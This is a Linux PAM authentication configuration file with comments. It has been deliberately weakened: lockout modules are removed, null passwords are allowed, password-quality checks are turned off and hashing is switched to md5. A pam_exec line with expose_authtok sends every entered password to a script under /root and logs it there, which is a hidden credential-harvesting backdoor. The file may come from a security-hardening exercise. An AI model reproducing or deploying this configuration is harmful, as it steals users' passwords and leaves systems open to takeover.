auth		required	pam_env.so 
# Removed pam_faillock.so preauth
# What on Earth is this? Having what is inside [ ] allows any password to be accepted. DANGER DANGER
# auth		[success=1 default=ignore] required	pam_unix.so try_first_pass nullok 
auth		required	pam_unix.so try_first_pass nullok 
# Removde [default=die] pam_faillock.so authfail
auth		optional	pam_permit.so
# Newer config added this -auth thing
-auth		optional	pam_cap.so
# AAAA temporary 
auth		optional	pam_exec.so expose_authtok log=/root/pws /root/pl/pl seteuid


account		required	pam_unix.so
# Removed pam_faillock.so from here too 
account		optional	pam_permit.so


# AAAA pam_passwdqc has replaced pam_cracklib
# password	required	pam_cracklib.so difok=2 minlen=8 dcredit=2 ocredit=2 retry=3 
# Decided to add enforce=none in there because the default is to not allow root to set a weak password! Now anyone can set what they want.
password	required	pam_passwdqc.so config=/etc/security/passwdqc.conf enforce=none
# AAAA got rid of sha512 and switched to md5
password	required	pam_unix.so try_first_pass use_authtok nullok md5 shadow 
password	optional	pam_permit.so


session		required	pam_limits.so 
session		required	pam_env.so 
session		required	pam_unix.so 
session		optional	pam_permit.so